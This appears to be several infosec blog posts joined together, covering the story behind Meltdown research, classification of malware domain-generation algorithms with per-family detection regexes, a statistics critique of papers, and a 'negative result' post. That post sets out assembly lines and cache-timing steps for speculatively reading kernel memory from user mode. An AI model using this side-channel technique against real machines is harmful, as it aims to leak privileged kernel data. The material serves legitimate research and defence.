I finally made the connection to speculative execution on December 2016/January 2017 when I prepared the presentation for HackPra about Covert Shotgun[17]. There are a lot of slides about speculative execution. At first, I didn’t think about reading kernel memory. My first “attack” was just another attack on KASLR. Essentially it was Hund, Willems, Holz in a speculative version- the work never really got finished (timing inside of speculative execution is possible, but not easy – I did not find a solution to this problem until much later) the rationale for doing this work is that it would solve a problem with their method and do this stuff in my spare time – fun is essential and this sounded like fun. So my project name for Meltdown was “undead KASLR”, despite me quickly figuring out there was bigger fish to be fried. I told my friend Halvar Flake about the weird ideas while presenting at IT-Defense in February and his encouragement was a big part of me actually continuing, because I didn’t believe it would work.

In March, I had the first chance to do some real work on the project during a small get away from work to present Jacob Torrey’s and my work on PUFs (the work was really mostly Jacobs – and not related to Meltdown per se) at Troopers 17. I researched mornings in the hotel and even did some research during other people’s talks. Fun fact: there is s a video of me doing a spectre-style attack POC on the code I’d added to Alex Ionescu’s wonderful Simplevisor. Hi Alex! I’m the bald head seen to the lower left of the center isle doing weird head movements and packing away my laptop as I succeeded at around 19 minutes into the video. The second half of the talk was pretty awesome btw!!

Later in March 2017, I visited Daniel, Michael, and Clementine Maurice in Graz to work on a common project we had on detecting double fetch bugs with a cache attack (which became this paper [21]. Here I tried to pitch my idea, because with the workload I had I knew it would be difficult for me to realize alone. Unfortunately, I wasn’t the only one fully booked out and Daniel, Michael and myself were super skeptical at that time, despite the slight encouragement I’d had at Troopers. So we decided to finish the stuff we were already doing first. Might I add here that Daniel and Michael did some really cool stuff since then? Struggling with work and making a sufficient contribution to the double fetch paper the project was on ice. The main reason why my name is so far back on the paper is that I didn’t have time to pull my weight.

After Troopers, I didn’t get much done and was really frustrated about it. So in July, I started back up again in the evenings. It helped me immensely that my climbing partner suffered an injury giving me a bit more time. This time around I was working targeted at Meltdown. I were doing stuff much too complicated at first and wasted a lot of time on that. Then I tried to simple things up as much as I could and this is why I ended up with a negative result. I wrote up the blog on company time on a Friday before noon before leaving early on a vacation. Luca Ebach helped proof read it. If he hadn’t it would’ve been unreadable and Tomasulo would’ve been spelled wrong.. The “Pandoras box” part of the blog post is a reference to the limited and unfinished stuff I did on “Spectre”, which I was sure would work at the time, but needed checking before I’d commit to blogging about it. While on vacation, I decided to wrap things up in an academic paper and with some positive results in my hands, seek help from some academic professionals. So I have continued my research afterward, after all you don’t open Pandora’s box without looking what is inside. In light of recent events, I shall not be publishing the rest of the stuff I did.

The stuff that Jann Horn did, is really really awesome, the same goes for the Spectre/Meltdown papers. It is wonderful to see that I was barking up the right tree. It is important to me to mention that Jann Horn reported his research prior to my blog post and did not have access to mine prior to that date.

Literature

[1] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.
[2] Nishat Herath, Anders Fogh. “These Are Not Your Grand Daddy’s CPU Performance Counters” Black Hat 2015, https://www.youtube.com/watch?v=dfIoKgw65I0
[3] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.
[4] Percival, Colin. “Cache missing for fun and profit.” (2005).

[5] Yarom, Yuval, and Katrina Falkner. “FLUSH+ RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack.” USENIX Security Symposium. 2014.
[6] Hund, Ralf, Carsten Willems, and Thorsten Holz. “Practical timing side-channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on. IEEE, 2013.
[7] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[8] Jang, Yeongjin, Sangho Lee, and Taesoo Kim. “Breaking kernel address space layout randomization with intel tsx.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.
[9] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump over ASLR: Attacking branch predictors to bypass ASLR.” Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on. IEEE, 2016.
[10] Wilhelm, Felx. “Mario Baslr”, https://github.com/felixwilhelm/mario_baslr
[11] Nissim, Enrique. “I Know Where Your Page Lives: De-randomizing the Windows 10 Kernel”. https://www.youtube.com/watch?v=WbAv2q9znok
[12] Fogh, Anders. “Covert Shotgun”, https://cyber.wtf/2016/09/27/covert-shotgun/
[13] Fogh, Anders, Gruss, Daniel. “Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process” Black Hat 2016.
[14] Fogh, Anders, “Micro architecture attacks on KASLR”,https://cyber.wtf/?s=kaslr
[15] Fogh, Anders. “Micro architecture attacks on KASLR and More”, https://www.youtube.com/watch?v=LyiB1jlUdN8
[16] Fogh, Anders, “Two covert channels”, https://cyber.wtf/2016/08/01/two-covert-channels/
[17[ Fogh, Anders, “Covert Shotgun”, https://www.youtube.com/watch?v=oVmPQCT5VkY&t=34s, Hack Pra 2017
[18] Schwarz, Michael, Fogh, Anders. “Drama: how your DRAM becomes a security problem”. Black Hat Europe 2016 https://www.youtube.com/watch?v=lSU6YzjIIiQ
[19] Ionescu, Alex, “SimpleVisor” https://github.com/ionescu 007/ “
[20] Neilson, Graeme, “Vox Ex Machina”, Troopers 17. https://www.youtube.com/watch?v=Xrlp_uNBlSs&t=1145s
[21] Schwarz, Michael, et al. “Automated Detection, Exploitation, and Elimination of Double-Fetch Bugs using Modern CPU Features.” arXiv preprint arXiv:1711.01254 (2017).
[22] Fogh, Anders. “Negative result: reading kernel memory from user mode” https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

DGA classification and detection for automated malware analysis

Introduction

Botnets are one of the biggest current threats for devices connected to the internet. Their methods to evade security actions are frequently improved. Most of the modern botnets use Domain Generation Algorithms (DGA) to generate and register many different domains for their Command-and-Control (C&C) server with the purpose to defend it from takeovers and blacklisting attempts.

To improve the automated analysis of DGA-based malware, we have developed an analysis system for detection and classification of DGA’s. In this blog post we will discuss and present several techniques of our developed DGA classifier.

The DGA detection can be useful to detect DGA-based malware. With the DGA classification it is also possible to see links between different malware samples of the same family. Such a classification is expressed with a description of the DGA as a regex.
Moreover, our analysis methods are based on the network traffic of single samples and not of a whole system or network, which is a difference to most of the related work.

DGA-based Botnets

A Domain Generation Algorithm (DGA) generates periodically a high number of pseudo-random domains that resolve to a C&C server of a botnet [H. 16]. The main reason of its usage by a botnet owner is that it highly complicates the process of a takeover by authorities (Sinkholing). In a typical infrastructure of a botnet that uses a static domain for the C&C server, authorities could take over the botnet with cooperation of the corresponding domain registrar by changing the settings of the static C&C domain (e.g. changing the DNS records).

infrastructure of typical botnets
Typical infrastructure of a botnet

With the usage of a DGA that is generating domains dynamically which resolve to the C&C server there is no effective sinkholing possible anymore. Since the bots use a new generated domain after every period to connect to the C&C server, it would be senseless to take control of a domain that is not used anymore by the bots to build up a connection to the C&C server.

infrastructure of typical dga botnets
Typical infrastructure of a DGA botnet

The C&C server and the bots use the same DGA with the same seed, so that they are able to generate the same set of domains. DGA’s use mostly the date as a seed to initialize the algorithm for domain generation. Hence the DGA creates a different set of domains everyday its run. To initialize a connection to the C&C server the bot needs to run first the DGA to generate a domain, that could be possibly also generated on the side of the C&C server, since both are using the same algorithm and seed [R. 13]. After every domain generation, the bot attempts to resolve the generated domain. These steps are repeated until the domain resolution succeeds, so that the bot figures out the current IP address of the corresponding C&C server. Through that DGA domain the bot can set up a connection to the C&C server.

Motivation

DGA detection can be very helpful to detect malware, because if it is possible to detect the usage of a DGA while analyzing the network traffic of a single sample, then it is very likely that the analyzed sample is malicious, since DGA’s are used commonly by malware but not by benign software. DGA classification is the next step in the analysis after a DGA has been detected. A successful classification returns a proper description of a DGA. With such a unified description, it is possible to group malware using the same DGA. Being able to group malware by correlating characteristics, leads to an improvement to the detection of new malware samples of these families. Therefore, the signatures of recently detected malware samples will be automatically blacklisted. The following figure shows for an non-DGA malware that grouping malware families based on the same domains in their DNS requests traffic will be only possible, if they use all the same and static C&C domain:

static domain
Two samples using the same static C&C domain

If the malware uses a DGA, then the grouping of malware will not be trivial anymore, because generated DGA domains are just used temporarily, thus using those to find links between samples would not be very effective.

domain mismatch
Two samples with the same DGA but a different seed

Note also that occurring domains in the network traffic of the recently analyzed malware sample could differ on another day with the same sample analyzed, since many DGA’s use the date as a seed. The solution is to calculate a seed-independent DGA description for every analyzed sample using a DGA. That description can be used then as a bridge between malware samples using the same DGA.

pattern descriptor
Pattern descriptor to abstract different DGA seeds

To solve this problem, we have divided it into three smaller tasks. Thus, the DGA classifier is structured into three components. Each component solves a task that contributes to the result of the DGA classification.

In this blog post we concentrate only on approaches for DGA detection and classification that are automatable, since we want to analyze a very high number of samples. Furthermore, we want to avoid as much as possible unnecessary network traffic, therefore we focus only on offline methods.

DGA Detection

This approach for DGA detection is based on statistical values calculated over the relevant label attributes of the domains. Since the domains generated by a DGA follow mostly a pattern, it is very useful to calculate the standard deviation of some attribute values [T. 13]. The average value can be also used for some attribute values to measure whether a domain is generated by a DGA or not. Those statistical values are also calculated over a list of domains from the Top 500 Alexa Ranking. These are considered as reference values for non-DGA domains regarding the relevant label attributes.

The domains with multiple levels are split into their labels for further analysis.
E.g. this domain: http://www.developers.google.com is split into:
com – Top-level domain (TLD)
google – Second-level domain
developers – Third-level domain
www – Fourth-level domain

All domains in the domain list resulting from a sample are compared level-wise, such that the labels of every domain are only compared with the same level.

To find proper indicators for DGA usage, we have done a level-wise comparison of statistical values calculated over several lexical properties of DGA domains and non-DGA domains (e.g. from Top 500 Alexa Ranking).

domain level.png
Different kinds of DGA patterns

Our experiments have proven that these statistical values over domain levels are very effective for DGA detection:

  • Average of the . . .
    • number of used hyphens
    • maximum number of contiguous consonants
  • Standard deviation of the . . .
    • string length of the label
    • consonant and vowel ratio
    • entropy
  • Redundancy of substrings or words in case of a wordlist DGA

With all these arguments, we can build a score with a specific threshold. If the score exceeds the threshold, the component will decide that the analyzed domain list was generated by a DGA. Since the arguments are based on statistical values, which lose their significance with smaller sets, it is also important to consider the case with too few domains. In this regard, the score is scaled down.

Separation of non-DGA Domains

Malware tries often to connect at first to a benign host (e.g. google.com) to check their connectivity to the internet. So, in case of DGA-based malware, the samples do not only send requests to DGA domains, but also to non-DGA domains. Hence the program for DGA classification needs to expect a domain list containing DGA domains and non-DGA domains. Before the program can classify a DGA, it needs to filter out the non-DGA domains. In this process, we assume that the majority of the domains in the domain list of the sample are DGA domains. Therefore, the non-DGA domains are considered as outliers. We used different outlier methods to identify non-DGA domains:

  • Outlying TLD-label
  • Outlying www-label
  • Find outlier with the method of Nalimov [A. 84] regarding following label attributes:
    • String length of the label
    • Digit and string length ratio
    • Hyphen and string length ratio
    • Consonant and vowel ratio
  • Outlying label count
  • Find outliers by too few occurring values regarding the following label attributes (the more a value occurs, the higher is the probability that it belongs to a DGA domain. We use the opposite case to find non-DGA domains here):
    • String length of the label
    • Consonant and vowel ratio
    • Digit and string length ratio
    • Entropy
    • Hyphen and string length ratio
    • Relative position of the first hyphen in the label

DGA Classification

After the separation process of DGA domains from non-DGA domains, we start with the classification of the DGA. The classifier analyzes the list of DGA domains and creates a, specific as possible, regex that matches all these DGA domains. If the separation is not completely successful, the program will continue with the classification based on DGA domains and non-DGA domains which could lead to a wrong description of the DGA. But not every failing separation process causes a wrong classification. In some cases, if non-DGA domains cannot be differentiated from DGA domains regarding any domain attributes, then the classification will still return the correct DGA description, since it covers only the relevant domain attributes. If the failing separation process causes a wrong DGA description, then the resulting wrong or imprecise DGA description could be interpreted still as a fingerprint calculated over the requested non-DGA domains and the DGA domains. That fingerprint is still useful to group malware of the same family, because it is very common that those requested non-DGA domains occur in other malware samples of the same family, too.

DGA’s do not generate necessarily always the same set of domains, because in most cases the seed of the DGA is changed (usually the date is used as seed).
In the following picture, you can see that the calculated DGA regexes are not matching because of the differentiating first letter, which seems to be seed-dependent in that case:

not equal dga
DGA with seed dependent first character

An important requirement to the automatically generated DGA description is that it needs to be independent of the seed. Since it is in our perspective not possible to determine which part of a DGA domain is seed dependent, we use an approach that tries to generalize the seed-dependent part of a domain.
For this task, we use three layers of regexes that are hierarchically arranged:

  1. Layer: very generalized pseudo-regex
  2. Layer: generalized regex
  3. Layer: specific regex

All those regexes can be interpreted as DGA descriptions (calculated with only one sample) of the same DGA with different precision.
Such hierarchy could look like this:

tinba dga
Tinba-DGA

simda dga
Simda-DGA

Evaluation

Out of 113.993 samples, the DGA classifier detects 782 DGA-based malware samples.
To determine the false positive rate, we have reviewed the results of the analysis system manually. Regarding the DGA detection we have found 38 false positives in our result set. Hence we have a false positive rate that is lower than 0.049% (with the assumption that the DGA-based malware samples queried a relative high number of different domains). A false negative evaluation is hard in this case, because the number of input sample is too high for manual evaluation. For an automatic false negative evaluation, the required ground truth of a large sample set is missing.

The following excerpt shows some specific DGA regexes from the DGA classification, which used 38.380 DGA-based malware samples as input:

Domain Fingerprint / Regex Matches Family name
[0-9A-Za-z]{8}\.kuaibu8\.cn 569 Razy
[a-hj-z]{3}y[a-z]{3}\.com 2082 simda
[a-z]{11}\.eu 829 simda
[a-z]{6,12}\.(com|info|net|org|dyndns\.org) 2047 Pykspa
[b-y]{12}\.(com|in|net|ru) 8508 tinba
[b-y]{12}\.com 6296 tinba
[b-y]{12}\.pw 7714 tinba
[b-y]{12}\.(biz|pw|space|us) 35 tinba
[b-y]{12}\.(cc|com|info|net) 17 tinba
[d-km-y]{12}\.(com|in|net|ru) 172 tinba
[d-y]{12}\.(com|in|net|ru) 110 tinba
[c-y]{12}\.(com|in|net|ru) 45 tinba
[df-km-su-x]{12}\.(com|in|net|ru) 110 tinba
[a-z]{8}\.info 216 tinba
v[12]{1}\.[a-uw-z]{7}\.ru 77 Kryptik
v1\.[a-uw-z]{7}\.ru 579
[b-np-z]{7,11}\.(com|net) 113
[0-9A-Za-z]{8}\.[aiktux]{3}i[abnu]{2}8\.cn 114
[a-y]{6,19}\.com 644 Ramnit
[a-z]{14,16}\.(biz|com|info|net|org) 173

It is conspicuous that the Tiny Banker Trojan (Tinba) has a very high occurrence with different specific regexes in the result set. After generalizing the most regexes of Tinba, as described in section 2.3, it will be possible to group all samples with only one regex. The missing family names are given by the fact that we could not detect automatically to which malware family the samples that used the DGA belongs.

Conclusion

The result shows that DGA detection and DGA classification can be very useful to detect new malware samples by their DGA. Hence it is also possible to find links between old and new malware samples of the same family via their classified DGA.
The DGA detection seems to be very reliable for samples that have queried many different domains. Our implemented concept for DGA classification seems to be in many cases successful. However, there are still cases where the calculated DGA descriptions are not correct, because the created patterns are sometimes overfitted to the given domain lists or rather non-DGA domains were considered in the calculation of the DGA descriptions, too. To confine this problem, we use a multi-layered regex generalization.
Even wrong DGA descriptions can be still considered as fingerprints calculated over the domain list of the sample. That fingerprint could be used to classify the DGA-based malware, so that it makes still a good contribution to automated malware analysis.

Literature

[A. 84] A. Zanker. Detection of outliers by means of Nalimov’s test – Chemical Engineering, 1984.

[H. 16] H. Zhang, M. Gharaibeh, S. Thanasoulas, C. Papadopoulos Colorado State University, Fort Collins, CO, USA. BotDigger: Detecting DGA Bots in a Single Network, 2016.

[R. 13] R. Sharifnya and M. Abadi – Tarbiat Modares University Tehran, Iran. A Novel Reputation System to Detect DGA-Based Botnets, 2013.

[T. 13] T. Frosch, M. Kührer, T. Holz – Horst Görtz Institute (HGI), Ruhr-University Bochum, Germany. Predentifier: Detecting Botnet C&C Domains From Passive DNS Data, 2013.

Negative Result: Reading Kernel Memory From User Mode

I were going to write an introduction about how important negative results can be. I didn’t. I assume you can figure out for yourself why that is and if not you got all the more reason to read this blog post. If you think it’s trivial why my result is negative, you definitely need to read the blog post.

The memory subsystem

I think most researchers would immediately think that reading kernel memory from an unprivileged process cannot work because “page tables”. That is what the Instruction Set Architecture or ISA says. But in order to understand why that was unsatisfactory to me we need to dig a bit deeper and I’ll start at the beginning.

 
When a software running on a Core requires memory it starts a so called “load” command. The load command is then processed in multiple stages until the data is found and returned or an error occurred. The Figure below shows a simplified version of this sub system.

Memory hierachy.png

Software including operating system uses virtual addressing to start a load (which is what a memory read is called inside the CPU). The first stage of processing is the L1 cache. The L1 cache is split between a data and an instruction cache. The L1 Cache is a so called VIPT or Virtually Indexed, Physically Tagged cache. This means the data can be looked up by directly using the virtual address of the load request.  This along with central position in the core makes the L1 incredibly fast. If the requested data was not found in the L1 cache the load must be passed down the cache hierarchy. This is the point where the page tables come into play. The page tables are used to translate the virtual address into a physical address. This is essentially how paging is enabled on x64. It is during this translation that privileges are checked. Once we have a physical address, the CPU can query the L2 cache and L3 cache in turn. Both are PITP caches (Physically Indexed, Physically Tagged) thus requiring the translation in the page tables before the lookup can be done. If no data was in the caches then the CPU will ask the memory controller to fetch the data in main memory. The latency of a data load in the L1 cache is around 5 clock cycles whereas a load from main memory is typically around 200 clock cycles. With the security check in the page tables and the L1 located before those we see already at this point that the because “page table” argument is too simple. That said – the intel manuals software developer’s manuals [2] states that the security settings is copied along the data into the L1 cache.

 

Speculative execution

In this and the next section I’ll outline the argumentation behind my theory, but only outline. For those a bit more interested it might be worth looking at my talk at HackPra from January [3] where I describe the pipeline in slightly more detail, though in a different context. Intel CPU’s are super scalar, pipelined CPU’s and they use speculative execution and that plays a big role in why I thought it may be possible read kernel memory from an unprivileged user mode process.   A very simplified overview of the pipeline can be seen in figure below.

 

pipeline.png

The pipeline starts with the instruction decoder. The instruction decoder reads bytes from memory, parse the buffer and output instructions.  Then it decodes instructions into micro ops. Micro ops are the building blocks of instructions. It is useful to think of x86 CPU’s as a Complex Instruction Set Computer (CISC) with a Reduced Instruction Set Computer (RISC) backend. It’s not entirely true, but it’s a useful way to think about it. The micro ops (the reduced instructions)  are queued into the reordering buffer. Here micro ops is kept it until all their dependencies have been resolved. Each cycle any micro ops with all dependencies resolved are scheduled on available execution units in first in ,first out order. With multiple specialized execution units many micro ops are executing at once and importantly due to dependencies and bottlenecks in execution units micro ops need not execute in the same order as the entered the reorder buffer. When a micro op is finished executing the result and exception status are added to the entry in the reorder buffer thus resolving dependencies of other micro ops. When all Micro ops belonging to a given instruction has been executed and have made it to the head of the reorder buffer queue they enter the retirement processing. Because the micro ops are at the head of the reorder buffer we can be sure that retirement is in the same order in which the micro ops were added to the queue. If an exception was flagged in the reorder buffer for a micro op being retired an interrupt is raised on the instruction to which the micro op belonged. Thus the interrupt is always raised on the instruction that caused even if the micro op that caused the interrupt was executed long before the entire instruction was done. A raised interrupt causes a flush of the pipeline, so that any micro op still in the reorder buffer is discarded and the instruction decoder reset. If no exception was thrown, the result is committed to the registers. This is essentially an implementation of Tomasulo’s algorithm [1] and allows multiple instructions to execute at the same time while maximizing resource use.

 

Abusing speculative execution

Imagine the following instruction executed in usermode

mov rax,[somekernelmodeaddress]

It will cause an interrupt when retired, but it’s not clear what happens between when the instruction is finished executing and the actual retirement. We know that once retired any information it may or may not have read is gone as it’ll never be committed to the architectural registers.. However, maybe we have a chance of seeing what was read if Intel relies perfectly on Tomasulo’s algorithm. Imagine the mov instruction sets the results in the reorder buffer as well as the flag that retirement should cause an interrupt and discard any data fetched. If this is the case we can execute additional code speculatively. Imagine the following code:

mov rax, [Somekerneladdress]

mov rbx, [someusermodeaddress]

If there are no dependencies both will execute simultaneous (there are two execution units for loads) and while the second will never get it’s result committed to the registers because it’ll be discarded when the firsts mov instruction causes an interrupt to be thrown. However, the second instruction will also execute speculatively and it may change the microarchitectural state of the CPU in a way that we can detect it. In this particular case the second mov instruction will load the

someusermodeaddress

into the cache hierarchy and we will be able to observe faster access time after structured exception handling took care of the exception. To make sure that the someusermodeaddress is not already in the cache hierarchy I can use the clflush instruction before starting the execution. Now only a single step is required for us to leak information about the kernel memory:

Mov rax, [somekerneladdress]

And rax, 1

Mov rbx,[rax+Someusermodeaddress]

 

If this is executed last two instructions are executed speculatively the address loaded differs depending on the value loaded from somekerneladdress and thus the address loaded into the cache may cause different cache lines to be loaded. This cache activity we can we can observe through a flush+reload cache attack.

The first problem we’re facing here is we must make sure the second and third instruction runs before the first one retires. We have a race condition we must win. How do we engineer that? We fill the reorder buffer with dependent instructions which use a different execution unit than the ones we need. Then we add the code listed above. The dependency forces the CPU to execute one micro op at a time of the filling instructions. Using an execution unit different than the one we used in the leaking code make sure that the CPU can speculatively execute these while working on the fill pattern.

The straight forward fill pattern I use is 300 add reg64, imm. I choose add rax, 0x141. I chose this because we have two execution units that are able to execute this instruction (Integer alus) and since they must execute sequentially one of these units will always be available to my leakage code (provided that another hardware thread in the same core isn’t mixing things up).

Since my kernel read mov instruction and my leaking mov instruction must run sequentially and that the data fetched by the leaking instruction cannot be in the cache the total execution time would be around 400 CLK’s if not the kernel address isn’t cached. This is a pretty steep cost given that an add rax, 0x141 cost around 3 CLK’s. For this reason, I see to it that the kernel address I’m accessing is loaded into the cache hierarchy. I use two different methods to ensure that. First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1. Gruss et al [4] concluded that prefetch instructions may load the cache despite of not having access rights. Further they showed that it’s possible for the page table traverse to abort and that would surely mean that I’m not getting a result. But having the data already in L1 will avoid this traverse.
 

All said and done there are a few assumptions I made about Intels implementation of Tomasulo’s algorithm:

1)    Speculative execution continues despite interrupt flag

2)    I can win the race condition between speculative execution and retirement

3)    I can load caches during speculative execution

4)    Data is provided despite interrupt flag

 

Evaluation

I ran the following tests on my i3-5005u Broadwell CPU.

I found no way I could separately test assumption 1,2 and 3. So I wrote up the code I outlined above and instead of code above I used the following code:

Mov rdi, [rdi];  where rdi is somekernelmodeaddress

mov rdi, [rdi + rcx+0]; where rcx is the Someusermodeaddress

Then I timed accessing the Someusermodeaddress after an exception handler dealt with the resulting exception. I did 1000 runs and sorted out  the 10 slowest out. First I did a run with the 2nd line above present with the value at the kernel mode address 0. I then did a second run with the second line commented out. This allows me test if I have a side channel inside the speculative execution. The results is summarized in the below histogram (mean and variance respectively: mean= 71.22 std = 3.31; mean= 286.17 std =  53.22). So obviously I have a statistic significant  covert channel inside the speculative execution.

 
In a second step I made sure that the kernel address I was trying to read had the value 4096.  Now if I’m actually reading kernelmode data the second line will fetch a cache line in the next page. Thus I would expect a slow access to Someusermodeaddress. As the speculative fetch should access a cache line exactly one page further. I selected the offset 4096 to avoid effects due to hardware prefetchers I could’ve added the size of a cache line. Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed. I double checked by accessing the cache line I wanted to access and indeed that address was not loaded into the cache either. Consequently it seems likely that intel do process the illegal reading of kernel mode memory, but do not copy the result into the reorder buffer. So at this point my experiment is failed and thus the negative result. Being really curious I added an add rdi,4096 instruction after the first line in the test code and could verify that this code was indeed executed speculatively and the result was side channeled out.

 

Pandoras box

While I  did set out to read kernel mode without privileges and that produced a negative result, I do feel like I opened a Pandora’s box. The thing is there was two positive results in my tests. The first is that Intel’s implementation of Tomasulo’s algorithm is not side channel safe. Consequently we have access to results of speculative execution despite the results never being committed. Secondly, my results demonstrate that speculative execution does indeed continue despite violations of the isolation between kernel mode and user mode.

This is truly bad news for the security. First it gives microarchitecture side channel attacks additional leverage – we can deduct not only information from is actually executed but also from what is speculatively executed. It also seems likely that we can influence what is speculative executed and what is not through influencing caches like the BTB see Dmitry Evtyushkin and Dmitry Ponomarev [5] for instance.It thus add another possibility to increase the expressiveness of microarchitecture side channel attacks and thus potentially allow an attacker even more leverage through the CPU. This of cause makes writing constant time code even more complex and thus it is definitely bad news.

Also it draws into doubt mitigations that rely on retirement of instructions. I cannot say I know how far that stretches, but my immediate guess would be that vmexit’s is handled on instruction retirement. Further we see that speculative execution does not consistently abide by isolation mechanism, thus it’s a haunting question what we can actually do with speculative execution.

 

Literature

[1] Intel® 64 and IA-32 Architectures Software Developer Manuals. Intel. https://software.intel.com/en-us/articles/intel-sdm

 

[2] Tomasulo, Robert M. (Jan 1967). “An Efficient Algorithm for Exploiting Multiple Arithmetic Units”. IBM Journal of Research and Development. IBM. 11 (1): 25–33. ISSN 0018-8646. doi:10.1147/rd.111.0025.

 

[3] Fogh, Anders. “Covert shotgun: Automatically finding covert channels in SMT”

https://www.youtube.com/watch?v=oVmPQCT5VkY.

 

[4] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.”

Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.

 

[5] Evtyushkin D, Ponomarev D, Abu-Ghazaleh N. Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR. InProceedings of 49th International Symposium on Microarchitecture (MICRO) 2016.

Statistics and Infosec

 

Introduction

 

The work by John Ioannidis [1] among others started the “reproduction crisis”. The “reproduction crisis” is the phrase used to describe that in many branches of science researchers have been unable to reproduce classic results which form the basis for our understanding of the world. Since the basic principle of modern science is about standing on the shoulders of giants, it is incredibly important that sound methodology is used to insure that our foundation is solid. For now the reproduction crisis has hardly reached information security and I hope it will stay that way. But unfortunately the information security scene is full of issues that make it vulnerable to reproduction problems. Top among them is methodology and the lack of reproduction studies. A huge amount of papers is accepted as true, but never reproduced and many papers suffer from methodologic problems.

 

In this blog post I will argue that among information security papers, very basic statistics could improve the process and reproducibility. Statistics is important as soon as observed data are noisy. Noisy data are everywhere even in computer science. Users are non-deterministic, unobserved variables, manufacturing variance, temperature and other environmental influences all effect our measurements. This of course does not mean that we cannot say anything meaningful about computers – it just means we need to embrace statistics and so far the information security science has not been very successfull at that. This purpose of this blog post is to suggest a baby step in the right direction – using sample size, mean and standard deviation as a mean of improving the expose on noisy data. I intentionally keep the theory short – I encourage everybody to read a real statistics book. Also, with the intention to provoke, I picked two examples of papers where the statistics could have been done better.

 

Statistics, Sample Size, Mean, and Standard Deviation 101

During a lecture my first statistics professor said that he would automatically flunk any of us in the future if we reported on noisy data without mentioning 3 data points on them. These data points are the sample size (N), the mean, and the standard deviation. The first reason for bringing these three data points is that it is as close as one gets to a standard in science . It is accepted in other sciences ranging from physics over medicine to economics. Having a standard on reporting noisy data allows us to compare studies easily and gives us an easy way to reproduce the findings of other people. Unfortunately, this standard appears to not have arrived in full force in information security yet.

But it is not only about a standard. The thing is: using these three values is not just a historical accident. There is sound theory why we want these three values. Imagine a process generating our data – usually called the data generating process or d.g.p. If the d.g.p. produces observations where the noise is independent of other observations we say the d.g.p. produces independent, identically distributed observations or i.i.d. If observations are not i.i.d. we cannot treat any variation as noise and consequently we need further analysis before we can draw any conclusion based on the data. Hence, i.i.d. is often assumed or considered a good approximation. And very often there are good reasons to do so.

With i.i.d. data the arithmetic mean of our observations will almost surely converge towards the mean of the d.g.p as the number of observations increases. This is called the law of large numbers. If one rolls a dice a thousand times and gets an arithmetic mean of 3.0, it is an indication that the dice is not a fair dice. This explains why we wish to report the arithmetic mean. If the number of samples is sufficiently high, then the arithmetic mean is “close” to the real mean of the data generating process.

Also with i.i.d. data the central limit theorem almost always applies. The central limit theorem says that we can expect the mean to tend towards normally distributed as the sample size increase. The normal distribution is characterized by only two parameters, its mean and its standard deviation. It allows us to check hypothesis about the data. The most basic tests can even be made on the back of an envelope. This allows to put a probability on the dice used in the previous example not being a fair dice – that we are not just observing noise.

Why we should include the sample size should be pretty obvious by now. Both the law of large numbers and the central limit theorem hinge on convergence over the sample size. Thus if we have a small sample size, we are unable to rely on any conclusions. That should not surprise you. Imagine throwing a dice 3 times getting 1,2, and 4 – you would be a fool to insist that your data show that 6 rarely happens. If you have thrown the dice a million times and do not see any 6’s the dice almost surely is not fair and the aforementioned conclusion would be pertinent.

In most first (or second if applied with rigor) semester statistics books, you can find a discussion on estimating how many samples you need based on the estimated standard deviation from a pilot sample or prior knowledge on the d.g.p. That of course can be turned around to evaluate if a study had sufficient sample size – yet another reason why these three numbers are valuable.

In short three small numbers in a 14 page paper can provide deep insight into the soundness of your methodology as well as making your paper easily comparable and reproducible.If  you are in doubt, you need to bring these 3 numbers. One word of caution though: I think these numbers are necessary but they may not be sufficient to describe the data. Also you will have no quarrel with me if I can easily calculate the standard deviation from reported data . For example report variance instead of standard deviation or omitting the standard deviation when reporting on proportions (the Bernoulli distribution is described only by its first moment) is just fine.

 

Case study 1: A Software Approach to Defeating Side Channels in Last-Level Caches

I will start out with a pretty good paper that could have been better if standard deviation and mean had been mentioned: “A Software Approach to Defeating Side Channels in Last-Level Caches “ by Zhou et al. [2]. The authors develop CacheBar – a method to mitigate cache side channel attacks. For Flush+Reload attacks they do a copy-on-access implementation to avoid sharing memory which effectively kills Flush+Reload as an attack vector. I shall concentrate on Zhou et al.s [2] protection against Prime+Probe. For this purpose, Zhou et al [2] use an overcommitted page coloring scheme. Using overcommitted page coloring allows for a significantly more flexible memory allocation and thus less performance penalty than the classic page coloring scheme. However, an attacker will remain able to Prime a cache set to a certain extend. Consequently, the scheme does not defeat Prime+Probe, but it does add noise. The paper analyzes this noise by first grouping observations of defender demand on a cache set into “None, one, few, some, lots and most” categories. They subsequently train a Baysian classifier on 500.000 Prime+Probe trials and present the classification result in a custom figure in matrix form. I have no objections thus far. If the authors think that this method of describing the noise provides insights then that is fine with me. I am however missing the standard deviation and mean – they do offer the sample size. Why do I think the paper would have been better if they had printed these two values?

  • The categories are arbitrary: To compare the results to other papers with noise (say noisy timers) we would have to categorize in exactly the same fashion.
  • Having reported means we would immediately be able to tell if the noise is biased. Bias would show up in the figures as misprediction but an attacker could adjust for bias.
  • With standard deviation we could calculate on a back of an envelope how many observations an attacker would need to actually successfully exfiltrate the information she is after and thus evaluate if the mitigation will make attacks impractical in different scenarios. For example, you can get lots of observations of encryption, but you cannot ask a user for his password 10000 times.
  • Reproducing a study will in the presence of noisy data always have slight differences. When the black and white matrix figures are close enough to consider reproduced? For means and standard deviation that question has been resolved.

